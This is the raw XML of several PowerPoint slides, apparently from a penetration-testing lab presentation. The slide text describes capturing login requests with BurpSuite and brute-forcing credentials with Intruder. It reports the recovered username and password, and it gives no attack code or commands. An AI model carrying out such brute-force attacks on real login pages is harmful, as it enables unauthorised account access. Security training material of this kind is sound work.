            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="5464135"/>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EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>BurpSuite was used to capture login page requests for further manipulation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5288161" y="2095976"/>
            <a:ext cx="4053959" cy="2505432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5288161" y="4910018"/>
            <a:ext cx="3248501" cy="406003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5288161" y="5464135"/>
            <a:ext cx="4053959" cy="1975247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>BurpSuite's Intruder was leveraged to brute force the login credentials using the downloaded username and password lists.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9712404" y="2095976"/>
            <a:ext cx="4053840" cy="2505432"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9712404" y="4910018"/>
            <a:ext cx="3824288" cy="406003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3150"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Successful Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9712404" y="5464135"/>
            <a:ext cx="4053840" cy="1580198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The brute force attack successfully obtained valid credentials: Username: "west" and Password: "madison."</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E6B7C-7147-AF36-52C3-D2A08D22051B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305050" y="2758506"/>
            <a:ext cx="9544050" cy="4874194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FC06C7C-CDB1-2A53-BE8B-B77D07C58387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047710" y="1367196"/>
            <a:ext cx="761286" cy="30480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 642330"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="60646A"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{141EFA81-F771-4534-E76B-1A0724234D5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588843" y="1137762"/>
            <a:ext cx="489347" cy="489347"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 40009"/>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6" name="Text 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5CB7E07-2940-2096-62A9-9196B2DF1128}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="772676" y="1210629"/>
            <a:ext cx="121563" cy="343495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4ADB5B2-239F-12BE-E601-DF6EA1434CB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029857" y="1110616"/>
            <a:ext cx="2862262" cy="357783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Login Page Capture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E52B777-20FF-80F7-03B8-1DEA73E8274A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029857" y="1598891"/>
            <a:ext cx="6098857" cy="696039"/>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BurpSuite was used to capture login page requests for further manipulation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1804145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74EE9C4-41D7-473D-A78D-ACAB46924CB2}">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44</TotalTime>
  <Words>1167</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>119</Paragraphs>
  <Slides>27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Barlow Bold</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</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Muhammad Yaseen</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-06T12:10:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-06T12:57:11Z</dcterms:modified>
</cp:coreProperties>
</file>